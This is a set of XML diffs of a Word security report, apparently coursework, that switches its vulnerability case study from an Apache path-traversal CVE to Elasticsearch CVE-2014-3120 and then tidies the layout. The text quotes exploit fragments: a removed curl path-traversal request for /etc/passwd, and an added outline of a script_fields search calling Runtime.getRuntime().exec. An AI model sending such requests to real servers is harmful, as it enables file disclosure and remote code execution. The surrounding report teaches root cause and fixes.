           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">Raw transcripts: </w:t>
+        <w:t xml:space="preserve">Raw transcript: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>reports/cve-41773-all.log</w:t>
+        <w:t>reports/cve-2014-3120-all.log</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>,</w:t>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5422,74 +5096,20 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>reports/cve-41773-phase1.log</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
+        <w:t>[[SCREENSHOT: fixed environment – attack returns 400, no file created, search still returns 1 hit]]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>reports/cve-41773-hardened-config.log</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>reports/cve-41773-phase2.log</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>[[SCREENSHOT: fixed environment – both attacks return 400, / still 200]]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>[[SCREENSHOT: hardened 2.4.49 – both attacks return 403, / still 200]]</w:t>
+        <w:t>[[SCREENSHOT: hardened 1.1.1 – same 400 rejection, site still functional]]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5567,7 +5187,21 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>The most transferable lesson is from part (c): a vulnerability does not have to</w:t>
+        <w:t xml:space="preserve">The most transferable lesson is from part (c): the flaw was not a missing </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>if</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5580,7 +5214,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>be a missing check. In CVE-2021-41773 the check existed and was correct — it</w:t>
+        <w:t>Elasticsearch 1.1.1 had a check — the request had to be well-formed JSON — but it</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5593,7 +5227,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>just ran on a different representation of the string than the one that was later</w:t>
+        <w:t>treated *code* as ordinary data, so the check was irrelevant. A capability that</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5606,7 +5240,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>used. Input must be normalised *before* it is validated, never after, and</w:t>
+        <w:t>lets a client run code is not something a filter can make safe; it has to be</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5619,7 +5253,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>defence in depth (default-deny + minimal attack surface) is what keeps one such</w:t>
+        <w:t>removed from the reachable surface, or at minimum switched off by default. The</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5632,7 +5266,33 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>mistake from becoming remote code execution.</w:t>
+        <w:t>same reasoning explains why the upgrade alone is not the whole answer: 1.4.4</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>fixed this CVE and still fell to a sandbox escape a year later</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>(CVE-2015-1427), while "no client-supplied scripts" would have prevented both.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6129,35 +5789,61 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>(</w:t>
+        <w:t>(Elasticsearch compiles and evaluates client-supplied scripts with full Java</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>reflection and no authentication). An exploit is the concrete request that</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>abuses it (</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>ap_normalize_path</w:t>
+        <w:t>POST /_search</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> accepts </w:t>
+        <w:t xml:space="preserve"> with </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>.%2e</w:t>
+        <w:t>script_fields</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> because it validates before decoding). An</w:t>
+        <w:t xml:space="preserve"> calling</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6167,10 +5853,17 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>Runtime.getRuntime().exec</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>exploit is the concrete sequence of requests that abuses it</w:t>
+        <w:t>). In this work the vulnerability is the dangerous</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6183,34 +5876,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>curl --path-as-is /icons/.%2e/…/etc/passwd</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>). In this work the</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>vulnerability is in Apache's normaliser; the exploit is the curl request.</w:t>
+        <w:t>default in the product; the exploit is the curl request.</w:t>
       </w:r>
     </w:p>
     <w:p>

</xml_diff>

<commit_message>
docs: polish the Word layout, fix appendix wording and numbering
</commit_message>
<xml_diff>
--- a/docs/Work1_Report.docx
+++ b/docs/Work1_Report.docx
@@ -102,12 +102,15 @@
             <w:tcW w:type="dxa" w:w="4677"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                 <w:sz w:val="22"/>
               </w:rPr>
-              <w:t>________________</w:t>
+              <w:t>____________</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -132,12 +135,15 @@
             <w:tcW w:type="dxa" w:w="4677"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                 <w:sz w:val="22"/>
               </w:rPr>
-              <w:t>________________</w:t>
+              <w:t>____________</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -162,12 +168,15 @@
             <w:tcW w:type="dxa" w:w="4677"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                 <w:sz w:val="22"/>
               </w:rPr>
-              <w:t>________________</w:t>
+              <w:t>____________</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -192,12 +201,15 @@
             <w:tcW w:type="dxa" w:w="4677"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                 <w:sz w:val="22"/>
               </w:rPr>
-              <w:t>________________</w:t>
+              <w:t>____________</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -222,12 +234,15 @@
             <w:tcW w:type="dxa" w:w="4677"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                 <w:sz w:val="22"/>
               </w:rPr>
-              <w:t>____ / ____ / 2026</w:t>
+              <w:t>______ / ______ / 2026</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -283,92 +298,27 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>The goal of the work is to walk the full security lifecycle of a small backend</w:t>
+        <w:t>The goal of the work is to walk the full security lifecycle of a small backend service: design it against the OWASP Top 10, automate the security checks in CI/CD, then take a real, publicly documented vulnerability, reproduce it in an isolated environment, explain its root cause, fix it and prove that the fix works without breaking the application.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>service: design it against the OWASP Top 10, automate the security checks in</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>CI/CD, then take a real, publicly documented vulnerability, reproduce it in an</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>isolated environment, explain its root cause, fix it and prove that the fix</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>works without breaking the application.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>Two deliverables are produced: a working, hardened REST API with a green</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">pipeline, and a reproducible analysis of </w:t>
+        <w:t xml:space="preserve">Two deliverables are produced: a working, hardened REST API with a green pipeline, and a reproducible analysis of </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -383,20 +333,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> in Elasticsearch</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>1.1.1 using the Vulhub environment.</w:t>
+        <w:t xml:space="preserve"> in Elasticsearch 1.1.1 using the Vulhub environment.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -442,6 +379,9 @@
             <w:tcW w:type="dxa" w:w="3118"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -462,6 +402,9 @@
             <w:tcW w:type="dxa" w:w="3118"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -482,6 +425,9 @@
             <w:tcW w:type="dxa" w:w="3118"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -504,6 +450,9 @@
             <w:tcW w:type="dxa" w:w="3118"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -519,6 +468,9 @@
             <w:tcW w:type="dxa" w:w="3118"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -534,6 +486,9 @@
             <w:tcW w:type="dxa" w:w="3118"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -551,6 +506,9 @@
             <w:tcW w:type="dxa" w:w="3118"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -566,6 +524,9 @@
             <w:tcW w:type="dxa" w:w="3118"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -595,6 +556,9 @@
             <w:tcW w:type="dxa" w:w="3118"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -612,6 +576,9 @@
             <w:tcW w:type="dxa" w:w="3118"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -627,6 +594,9 @@
             <w:tcW w:type="dxa" w:w="3118"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -642,6 +612,9 @@
             <w:tcW w:type="dxa" w:w="3118"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -659,6 +632,9 @@
             <w:tcW w:type="dxa" w:w="3118"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -674,6 +650,9 @@
             <w:tcW w:type="dxa" w:w="3118"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -689,6 +668,9 @@
             <w:tcW w:type="dxa" w:w="3118"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -706,6 +688,9 @@
             <w:tcW w:type="dxa" w:w="3118"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -721,6 +706,9 @@
             <w:tcW w:type="dxa" w:w="3118"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -736,6 +724,9 @@
             <w:tcW w:type="dxa" w:w="3118"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -753,6 +744,9 @@
             <w:tcW w:type="dxa" w:w="3118"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -768,6 +762,9 @@
             <w:tcW w:type="dxa" w:w="3118"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -783,6 +780,9 @@
             <w:tcW w:type="dxa" w:w="3118"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -827,6 +827,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -847,6 +850,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -867,6 +873,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -887,6 +896,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -909,6 +921,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -924,6 +939,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -939,6 +957,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -954,6 +975,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -971,6 +995,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -986,6 +1013,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -1001,6 +1031,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -1016,6 +1049,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -1040,6 +1076,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -1055,6 +1094,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -1070,6 +1112,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -1085,6 +1130,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -1110,6 +1158,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -1125,6 +1176,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -1140,6 +1194,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -1155,6 +1212,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -1172,6 +1232,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -1187,6 +1250,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -1202,6 +1268,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -1217,6 +1286,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -1234,6 +1306,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -1249,6 +1324,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -1264,6 +1342,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -1279,6 +1360,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -1295,7 +1379,7 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1338,7 +1422,7 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:jc w:val="left"/>
